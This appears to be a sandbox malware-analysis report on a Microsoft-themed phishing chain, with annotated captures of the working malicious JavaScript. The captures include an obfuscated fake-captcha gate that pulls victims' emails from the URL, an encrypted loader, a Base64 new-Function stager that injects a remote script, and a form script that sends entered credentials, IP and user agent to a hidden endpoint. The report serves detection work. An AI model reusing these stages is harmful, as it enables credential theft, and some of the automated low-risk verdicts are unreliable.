URL: http://sammobile.digidip.net Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": true,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: http://sammobile.digidip.net |
URL: https://massageclinic.com.au/wadblacks2/captcha.js... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. While some of the behaviors may be related to legitimate functionality like analytics or error reporting, the overall level of obfuscation and suspicious activity raises significant concerns. Further investigation is warranted to determine the true intent and nature of this script."
} |
const _0x50eb76=_0xa93f;(function(_0x5318f6,_0x37e9e8){const _0x55eaef=_0xa93f,_0x1d981e=_0x5318f6();while(!![]){try{const _0x34adaf=-parseInt(_0x55eaef(0x198))/0x1+parseInt(_0x55eaef(0x176))/0x2*(-parseInt(_0x55eaef(0x173))/0x3)+-parseInt(_0x55eaef(0x174))/0x4*(parseInt(_0x55eaef(0x161))/0x5)+parseInt(_0x55eaef(0x14d))/0x6*(-parseInt(_0x55eaef(0x179))/0x7)+parseInt(_0x55eaef(0x155))/0x8+-parseInt(_0x55eaef(0x165))/0x9+parseInt(_0x55eaef(0x180))/0xa;if(_0x34adaf===_0x37e9e8)break;else _0x1d981e['push'](_0x1d981e['shift']());}catch(_0x1c9068){_0x1d981e['push'](_0x1d981e['shift']());}}}(_0x1bc3,0x7ebea));let extractedEmail='',mouseMovements=[],mouseDownDuration=null;function _0xa93f(_0x25bd85,_0x10afe9){const _0x1bc318=_0x1bc3();return _0xa93f=function(_0xa93fe4,_0x209a26){_0xa93fe4=_0xa93fe4-0x14d;let _0xaeccec=_0x1bc318[_0xa93fe4];return _0xaeccec;},_0xa93f(_0x25bd85,_0x10afe9);}const startTime=Date['now']();let failedAttempts=0x0;function extractEmail(){const _0x1e2735=_0xa93f,_0xbed409=decodeURIComponent(window[_0x1e2735(0x18d)]['href']),_0xd5a59c=window[_0x1e2735(0x18d)][_0x1e2735(0x172)][_0x1e2735(0x187)](0x1),_0x2dcec5=_0xd5a59c||_0xbed409[_0x1e2735(0x192)](/([^\/]+)$/)?.[0x1];if(_0x2dcec5)try{const _0x2e9731=atob(_0x2dcec5);_0x2e9731&&_0x2e9731[_0x1e2735(0x16f)]('@')&&(extractedEmail=_0x2e9731);}catch(_0x5c37ef){console[_0x1e2735(0x16a)](_0x1e2735(0x156),_0x5c37ef);}}function _0x1bc3(){const 
_0x390f0d=['2858253nsBRNx','2757964DLsqKS','toString','2qxzqjs','message','createElement','2727277SoJrWp','target-image','Failed\x20to\x20load\x20target\x20image:','getElementById','permanently_blocked','server.php','push','24513270OFjeDv','captcha-option','slice','Error\x20loading\x20images:','You\x20can\x20now\x20retry.','textContent','get_images.php','substring','abs','\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20style=\x22padding:\x2020px;\x20text-align:\x20center;\x20position:\x20absolute;\x20top:\x2050%;\x20left:\x2050%;\x20transform:\x20translate(-50%,\x20-50%);\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<h1\x20style=\x22color:\x20red;\x22>Restricted</h1>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<p>','sort','clientX','redirect','location','add','\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20\x20\x20','Retry\x20in\x20','<p\x20id=\x22block-timer\x22></p>','match','clientY','image-options','touchstart','POST','block-timer','411662xxnBIK','filter.php','\x20seconds.','6JPeuci','appendChild','click','src','redirect_url','json','floor','innerHTML','4095360MKmcPm','Error\x20decoding\x20email:','random','No\x20images\x20found','block','img','Error\x20handling\x20image\x20click:','href','body','mousemove','addEventListener','blocked','5AWlBuM','style','display','onload','5274PTpXDs','innerWidth','application/json','forEach','reason','error','now','stringify','You\x20are\x20temporarily\x20blocked.','length','includes','classList','substr','hash'];_0x1bc3=function(){return _0x390f0d;};return _0x1bc3();}extractEmail(),window[_0x50eb76(0x15f)]('hashchange',extractEmail),document[_0x50eb76(0x15f)]('DOMContentLoaded',async()=>{const _0x1d7deb=_0x50eb76,_0xb28b0=document[_0x1d7deb(0x17c)](_0x1d7deb(0x194)),_0x318782=document[_0x1d7deb(0x17c)](_0x1d7deb(0x17a));let 
_0x793576='default-'+Math['random']()[_0x1d7deb(0x175)](0x24)[_0x1d7deb(0x171)](0x2,0x9);window[_0x1d7deb(0x166)]>0x300&&document[_0x1d7deb(0x15f)](_0x1d7deb(0x15e),_0x12bcb7=>{const _0x440973=_0x1d7deb;mouseMovements[_0x440973(0x17f)]({'x':_0x12bcb7[_0x440973(0x18b)],'y':_0x12bcb7[_0x440973(0x193)],'timestamp':Date['now']()}),mouseMovements[_0x440973(0x16e)]>0x64&&mouseMovements['shift']();});document[_0x1d7deb(0x15f)]('mousedown',()=>{const _0x249a07=_0x1d7deb;!mouseDownDuration&&(mouseDownDuration=Date[_0x249a07(0x16b)]()-startTime);}),document[_0x1d7deb(0x15f)](_0x1d7deb(0x195),()=>{const _0x5d6b4f=_0x1d7deb;!mouseDownDuration&&(mouseDownDuration=Date[_0x5d6b4f(0x16b)]()-star |
URL: https://massageclinic.com.au/wadblacks2/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://massageclinic.com.au Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://massageclinic.com.au |
URL: https://massageclinic.com.au/wadblacks2/ Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
URL: https://empressachkaortshe.s3.ap-northeast-2.amazo... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "The script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and interaction with suspicious domains. While the script appears to have a legitimate purpose (potentially related to Microsoft Office support), the use of obfuscated code and the lack of transparency around the data being sent raise significant security concerns."
} |
// Analyst note: opaque Base64 blobs embedded in the captured loader; neither is decoded in this report.
// `usuuid` is sent as the `psk` field of the POST issued by GEInfo() below, and the same literal
// reappears as `psk` in the form script captured later in this report, so it can serve as a
// correlation string across the stages of this sample.
let usuuid = "tKMfeGRWKPcKcq7hmgj2aB6fkPq+wd3Ju5k4EkToBB5Socm8yosJwgF/qhRDip3Pd/0LuvDy3vyalLB42uR+1Q==";
// `policy` is only ever passed to decstr(); the resulting plaintext is used as the fetch() target in GEInfo().
let policy = "Upuzk3V1WMMG4sMCmrth+iwGUJ+xnI5+MAOnWPam1IZQGLRkwfAq5W/RwyNrdwxqijCn2bg9OIBIfdBEOuDvdw==";
// String flags that are not read anywhere in this snippet. The form script captured later in this
// report sends globals with these names as `send_visit` and `send_invalid_result`.
let SV = "0";
let SIR = "0";
/**
 * Decrypts a Base64 blob laid out as [16-byte IV][ciphertext] with AES-CBC / PKCS#7 (CryptoJS).
 *
 * Analyst note: there is no MAC or other integrity check on the blob, and the key is used as
 * raw UTF-8 text rather than being derived. In this sample the helper is used to hide a URL and
 * the page body from static inspection of the hosted file.
 *
 * @param {string} encryptedString - Base64 text whose first four 32-bit words are the IV.
 * @param {string} key - Key text; must be 16, 24 or 32 characters long.
 * @returns {string} The plaintext decoded as UTF-8.
 * @throws {Error} If the key length is not 16, 24 or 32.
 */
function decstr(encryptedString, key) {
const keySize = [16, 24, 32];
// Length is measured on the string, which equals the byte length only for single-byte (ASCII) keys.
if (!keySize.includes(key.length)) {
throw new Error("Incorrect AES key length. Use a 16, 24, or 32 bytes key.");
}
const encryptedData = CryptoJS.enc.Base64.parse(encryptedString);
// First 4 words (16 bytes) are the IV ...
const iv = CryptoJS.lib.WordArray.create(encryptedData.words.slice(0, 4));
// ... and everything after them is treated as ciphertext.
const ciphertext = CryptoJS.lib.WordArray.create(
encryptedData.words.slice(4)
);
const decryptedData = CryptoJS.AES.decrypt(
{
ciphertext: ciphertext,
},
// The key string is converted to bytes as UTF-8; no hashing or KDF is applied in this variant.
CryptoJS.enc.Utf8.parse(key),
{
iv: iv,
mode: CryptoJS.mode.CBC,
padding: CryptoJS.pad.Pkcs7,
}
);
return decryptedData.toString(CryptoJS.enc.Utf8);
}
/**
 * Second-stage fetch of the captured loader: POSTs a JSON request to a URL that exists only in
 * encrypted form in this file, then writes the decrypted response into the document.
 *
 * Analyst notes (all from the code below):
 * - The target URL is decstr(policy, <hard-coded 16-character key>), so it does not appear in
 *   clear text in the hosted file; a reviewer has to run the decryption or observe the request.
 * - On success the server returns both the ciphertext (`b`) and the key (`a`), so the encryption
 *   does not protect the content from anyone who sees the response; its visible effect is that the
 *   rendered markup is absent from the static file.
 * - document.write() of server-supplied content means the visible page is whatever the remote
 *   endpoint returns at request time. Network capture of this POST and its response is the
 *   reliable place to recover the rendered content.
 *
 * @returns {Promise<void>} Resolves after the document has been written; errors are caught and logged.
 */
async function GEInfo() {
try {
const response = await fetch(decstr(policy, "708b91a2n3k4a5i6"), {
method: "POST",
body: JSON.stringify({
// Sent under the name `psk`; the value is the opaque `usuuid` blob defined above.
psk: usuuid,
do: "GURI",
// A genuine support.microsoft.com address is passed to the server as `redirect_url`;
// how the server uses it is not visible in this snippet.
redirect_url: "https://support.microsoft.com/en-us/office/-something-went-wrong-error-when-you-try-to-start-an-office-app-4b4471dd-cf86-4a37-910d-35a01a6c7d17",
theme: "office",
}),
headers: {
"Content-Type": "application/json",
},
});
const data = await response.json();
if (data.c === "success") {
// `b` is the encrypted page body and `a` the key, both taken from the response.
document.write(decstr(data.b, data.a));
} else {
// `data` is the parsed JSON value; an object interpolates here as "[object Object]".
document.write(`<p>${data}</p>`);
}
} catch (error) {
console.error("Error:", error);
document.write("An error occurred while making the request.");
}
}
// Runs GEInfo() as soon as the script is evaluated; no user interaction is required.
(async () => {
await GEInfo();
})();
|
URL: https://empressachkaortshe.s3.ap-northeast-2.amazo... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirection to a suspicious domain. The use of base64 encoding to obfuscate the script's contents further increases the risk. Overall, this script exhibits a high level of malicious intent and should be treated as a significant security threat."
} |
// Analyst note: staged loader. The Base64 argument is decoded with atob() and executed through
// the Function constructor, so the executed source never appears in clear text in this file.
// Decoded, it is two statements: an array of short string fragments joined into an https script
// URL on deleonaccessfloors.com (the host of the next entry in this report), followed by a
// document.write() that emits a script tag with that URL as its src. The closing tag is itself
// split into two string pieces. Splitting the URL into fragments keeps the full address out of
// both the encoded and decoded text as a single string.
// Detection pointers: `new Function(atob(` on a page that otherwise has no markup, and
// document.write of a script element whose src is built at run time.
new Function(atob(`bm1uYW1IdmYgPSBbJ2h0JywgJ3RwczovJywgJy9kZWwnLCAnZW8nLCAnbmEnLCAnY2Nlc3MnLCAnZmxvJywgJ29yJywgJ3MuY29tLycsICdjMi00JywgJy00OGMnLCAnbTMtNCcsICc2MmMtMzcnLCAnNGNtJywgJy0yJywgJzc0MicsICdtLTInLCAnNGxhL21hJywgJ2ZpbG9zJywgJy9hdCcsICd0YScsICdjaC8nLCAnanMnLCAnL1pnbicsICd5a3YzJywgJzEyJywgJ2xlbXY4JywgJ1FOJywgJ3RoTFMnLCAndWcnLCAnQWJDaWwnLCAnejAnLCAnd0RTaScsICdLOUknLCAnS1YnLCAnZW0yJywgJ3JTY1RzSycsICdIY2kuaicsICdzJ10uam9pbihgYCk7CmRvY3VtZW50LndyaXRlKCc8c2NyaXB0IHNyYz0iJytubW5hbUh2ZisnIj48LycgKyAnc2NyaXB0PicpOw==`))();
|
URL: https://deleonaccessfloors.com/c2-4-48cm3-462c-374... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The provided JavaScript snippet appears to be a decryption function that uses the CryptoJS library to decrypt an encrypted string. The function takes an encrypted string and a key as input, and performs AES decryption using the provided key. This behavior is consistent with legitimate cryptographic operations and does not exhibit any high-risk indicators. The use of CryptoJS is a common practice for client-side encryption/decryption, and the function does not appear to be engaging in any suspicious activities like data exfiltration or dynamic code execution. Therefore, the risk score is assessed as low."
} |
/**
 * Variant of the AES-CBC / PKCS#7 decrypt helper seen earlier in this report. The blob layout is
 * the same ([16-byte IV][ciphertext], Base64), but the AES key is the SHA-256 digest of `key`
 * instead of the raw key text, and there is no key-length check.
 *
 * Analyst note: the helper by itself only decrypts. The call on the line after this function is
 * cut off in the report, so the plaintext and what is done with it are not visible here; a verdict
 * on this snippet should take the caller into account, not the helper alone.
 *
 * @param {string} encryptedString - Base64 text whose first four 32-bit words are the IV.
 * @param {string} key - Passphrase that is hashed to form the AES key.
 * @returns {string} The plaintext decoded as UTF-8.
 */
function decstr(encryptedString, key) {
const encryptedData = CryptoJS.enc.Base64.parse(encryptedString);
// First 4 words (16 bytes) are the IV; the remainder is the ciphertext.
const iv = CryptoJS.lib.WordArray.create(encryptedData.words.slice(0, 4));
const ciphertext = CryptoJS.lib.WordArray.create(
encryptedData.words.slice(4)
);
// Single unsalted SHA-256 pass over the passphrase; the first 8 words (32 bytes) become the key.
const hashedKey = CryptoJS.SHA256(key);
const aesKey = CryptoJS.lib.WordArray.create(hashedKey.words.slice(0, 8));
const decrypted = CryptoJS.AES.decrypt({ ciphertext: ciphertext }, aesKey, {
iv: iv,
mode: CryptoJS.mode.CBC,
padding: CryptoJS.pad.Pkcs7,
});
return decrypted.toString(CryptoJS.enc.Utf8);
}
let ballerina = decstr(atob("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 |
URL: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a part of the CryptoJS library, which is a well-known and widely used cryptography library. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code primarily focuses on cryptographic operations and utility functions, which are common in legitimate applications. While it uses some legacy practices like the `XDomainRequest` API, these pose only minor risks and are not inherently malicious. Overall, the script seems to be a benign implementation of common cryptographic functionality."
} |
!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null,e};function n(){}var e={},o=e.lib={},s=o.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},f=o.WordArray=s.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||a).stringify(this)},concat:function(t){var e=this.words,r=t.words,i=this.sigBytes,n=t.sigBytes;if(this.clamp(),i%4)for(var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var 
t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:function(){var t=s.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(i());return new f.init(e,t)}}),c=e.enc={},a=c.Hex={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push((o>>>4).toString(16)),i.push((15&o).toString(16))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i+=2)r[i>>>3]|=parseInt(t.substr(i,2),16)<<24-i%8*4;return new f.init(r,e/2)}},h=c.Latin1={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new f.init(r,e)}},d=c.Utf8={stringify:function(t){try{return decodeURIComponent(escape(h.stringify(t)))}catch(t){throw new Error("Malformed UTF-8 data")}},parse:function(t){return h.parse(unescape(encodeURIComponent(t)))}},u=o.BufferedBlockAlgorithm=s.extend({reset:function(){this._data=new f.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=d.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProcessBlock(i,h);e=i.splice(0,c),r.sigBytes-=a}return new f.init(e,a)},clone:function(){var t=s.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),p=(o.Hasher=u.extend({cfg:s.extend(),init:function(t){this.cfg=this.cfg.extend(t),this.reset()},reset:function(){u.reset.call(this),this._doReset()},update:function(t){return this._append(t),this._process(),this},finalize:function(t){return t&&this._append(t),this._doFinalize()},blockSize:16,_createHelper:function(r){return function(t,e){return new 
r.init(e).finalize(t)}},_createHmacHelper:function(r){return function(t,e){return new p.HMA |
URL: https://empressachkaortshe.s3.ap-northeast-2.amazonaws.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": true,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://empressachkaortshe.s3.ap-northeast-2.amazonaws.com |
URL: https://empressachkaortshe.s3.ap-northeast-2.amazo... Model: Joe Sandbox AI | {
"risk_score": 5,
"reasoning": "The provided JavaScript snippet contains a mix of behaviors that require further review. While it includes some potentially legitimate functionality, such as IP address retrieval and encryption, there are also indicators of moderate risk, including external data transmission and the use of obfuscated code. The overall behavior is not clearly malicious, but the script's intent and the nature of the transmitted data are not fully transparent. Additional context or analysis would be needed to determine the true purpose and risk level of this script."
} |
// Filled with the visitor's public IP by eO4f1dE(); value() later sends it as the `IP` field.
let current_ip = null;
/**
 * Encrypts text with AES-CBC / PKCS#7 under a random 16-byte IV and returns Base64 of
 * [IV][ciphertext], the same layout that the decstr() helpers in this report consume.
 *
 * Analyst note: no call to this function is visible in the captured excerpt, so what it is
 * applied to cannot be stated from this page.
 *
 * @param {string} plainText - Text to encrypt (encoded as UTF-8).
 * @param {string} key - Key text; must be 16, 24 or 32 characters long and is used as raw UTF-8.
 * @returns {string} Base64 of the IV followed by the ciphertext.
 * @throws {Error} If the key length is not 16, 24 or 32.
 */
function PhiJA(plainText, key) {
const keySize = [16, 24, 32];
if (!keySize.includes(key.length)) {
throw new Error("Incorrect AES key length. Use a 16, 24, or 32 bytes key.");
}
// Generate a random IV (initialization vector)
const iv = CryptoJS.lib.WordArray.random(16);
// Encrypt the plain text using AES with the given key and random IV
const encrypted = CryptoJS.AES.encrypt(CryptoJS.enc.Utf8.parse(plainText), CryptoJS.enc.Utf8.parse(key), {
iv: iv,
mode: CryptoJS.mode.CBC,
padding: CryptoJS.pad.Pkcs7
});
// Combine the IV and ciphertext (IV is necessary for decryption)
const encryptedData = iv.concat(encrypted.ciphertext);
// Convert the combined data to Base64 for easy transmission or storage
return CryptoJS.enc.Base64.stringify(encryptedData);
}
// Same literal as `usuuid` in the loader script captured earlier in this report; value() sends it
// as `psk` with every request, which ties the form stage to the loader stage.
let psk = "tKMfeGRWKPcKcq7hmgj2aB6fkPq+wd3Ju5k4EkToBB5Socm8yosJwgF/qhRDip3Pd/0LuvDy3vyalLB42uR+1Q==";
/**
 * Looks up the visitor's public IP address through the api.ipify.org JSON endpoint.
 *
 * Analyst note: a request to a public IP-echo service from a page that shows a sign-in form is a
 * useful network-side indicator, because the result is forwarded with the submitted form data
 * (see the `IP` field in value()).
 *
 * @returns {Promise<string|null>} The `ip` field of the response, or null if the request fails.
 */
async function eO4f1dE() {
try {
const response = await fetch("https://api.ipify.org?format=json");
const json = await response.json();
return json.ip;
} catch (error) {
console.error(error);
return null;
}
}
// Start the IP lookup as soon as the script loads; value() repeats it if this has not finished.
(async function () {
current_ip = await eO4f1dE();
})();
// Element ids throughout this script are short random-looking strings, so id-based signatures are
// unlikely to carry over between samples; the structure of the handlers is the stable part.
// First input: Enter (key code 13) or the adjacent button both call value().
$("#liAGwMXB").on("keypress", function (e) {
if (e.which == 13) {
value();
}
});
$("#gbwCG").on("click", function () {
value();
});
// Second input: Enter or its button call N5N5tgOvA(), which is not defined in the captured excerpt.
$("#vhxxVAU").on("keypress", function (e) {
if (e.which == 13) {
N5N5tgOvA();
}
});
$("#JiHpm6l").on("click", function () {
N5N5tgOvA();
});
// Two controls that strip the URL fragment (if any) and reload the page.
$("#dwdgS, #YRxjDgOe").click(function (e) {
e.preventDefault();
if (window.location.hash)
history.replaceState(
null,
"",
window.location.href.replace(window.location.hash, "")
);
location.reload();
});
// Placeholder texts are stored Base64-encoded; they decode to "Email, phone, or Skype" and
// "Password " (with a trailing space), which keeps those strings out of the static source.
$("#liAGwMXB").prop("placeholder", atob("RW1haWwsIHBob25lLCBvciBTa3lwZQ=="));
$("#vhxxVAU").prop("placeholder", atob("UGFzc3dvcmQg"));
// Globals declared without a value. gB() treats the first three as request objects (it checks
// readyState and calls abort()); DhVSIaQl is not used in the captured excerpt.
var d87sOS;
var TCWoiyr;
var Hbzfh;
var DhVSIaQl;
/**
 * Resets the visible step: hides five page elements, shows one, and aborts any of the three
 * tracked requests (d87sOS, TCWoiyr, Hbzfh) that have not reached readyState 4.
 * Which screens the element ids correspond to is not visible in this excerpt.
 */
function gB() {
$("#v181sVyO").hide();
$("#y2MDXz").hide();
$("#qmBibhh").hide();
$("#InpUQGp").hide();
$("#AGS1Xc").hide();
$("#sUjPv").show();
// readyState 4 means the request has completed; anything else is still in flight and is cancelled.
if (d87sOS && d87sOS.readyState !== 4) {
d87sOS.abort();
}
if (TCWoiyr && TCWoiyr.readyState !== 4) {
TCWoiyr.abort();
}
if (Hbzfh && Hbzfh.readyState !== 4) {
Hbzfh.abort();
}
}
// Two controls that navigate away from the page. The Base64 string decodes to the same
// support.microsoft.com Office help URL that the loader script in this report sends as
// `redirect_url`, so the visitor ends up on a genuine Microsoft page.
$("#Tb3s6i, #VhvRKrD4S").click(function (e) {
window.location.href = atob(
"aHR0cHM6Ly9zdXBwb3J0Lm1pY3Jvc29mdC5jb20vZW4tdXMvb2ZmaWNlLy1zb21ldGhpbmctd2VudC13cm9uZy1lcnJvci13aGVuLXlvdS10cnktdG8tc3RhcnQtYW4tb2ZmaWNlLWFwcC00YjQ0NzFkZC1jZjg2LTRhMzctOTEwZC0zNWEwMWE2YzdkMTc="
);
});
// The collection endpoint is not hard-coded in this script: it is read from the value of the
// page element #ohbop and Base64-decoded, then used as the `url` of the $.ajax POST in value().
// Recovering it requires the rendered DOM or the network capture, not this script alone.
var qQYnHttS = atob($("#ohbop").val());
async function value() {
$("#bYGpvs").text("");
var cHEPiX9b = $("#liAGwMXB").val();
var fajEGCCfu =
'<span class="Wq3VBi">laden</span>E<span class="Wq3VBi">laden</span>nte<span class="Wq3VBi">laden</span>r <span class="Wq3VBi">laden</span>a v<span class="Wq3VBi">laden</span>ali<span class="Wq3VBi">laden</span>d e<span class="Wq3VBi">laden</span>mai<span class="Wq3VBi">laden</span>l ad<span class="Wq3VBi">laden</span>dres<span class="Wq3VBi">laden</span>s, p<span class="Wq3VBi">laden</span>hon<span class="Wq3VBi">laden</span>e nu<span class="Wq3VBi">laden</span>mbe<span class="Wq3VBi">laden</span>r<span class="Wq3VBi">laden</span> or<span class="Wq3VBi">laden</span> Sk<span class="Wq3VBi">laden</span>yp<span class="Wq3VBi">laden</span>e <span class="Wq3VBi">laden</span>na<span class="Wq3VBi">laden</span>m<span class="Wq3VBi">laden</span>e.';
if (!current_ip) {
current_ip = await eO4f1dE(); // Ensure the IP is fetched if not yet set
}
if (Ewvwmt($("#liAGwMXB").val())) {
$("#kfWDyp").css("display", "block");
$("#gbwCG").prop("disabled", true);
$.ajax({
url: qQYnHttS,
cache: false,
type: "POST",
data: JSON.stringify({
do: "check",
em: cHEPiX9b,
IP: current_ip,
bdata: navigator.userAgent,
psk: psk,
send_visit: SV,
send_invalid_result: SIR,
|
URL: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "The provided JavaScript snippet appears to be a part of the CryptoJS library, which is a well-known and widely used cryptography library. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code is primarily focused on implementing various cryptographic primitives and utilities, which are common in legitimate applications. While the code uses some legacy practices like the `XDomainRequest` API, these are not inherently malicious and are likely used for compatibility reasons. Overall, this script appears to be a benign implementation of cryptographic functionality and poses a low risk."
} |
!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},l=n.WordArray=o.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||c).stringify(this)},concat:function(t){var e=this.words,r=t.words,i=this.sigBytes,n=t.sigBytes;if(this.clamp(),i%4)for(var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(var c=0;c<n;c+=4)e[i+c>>>2]=r[c>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=h.ceil(e/4)},clone:function(){var t=o.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new 
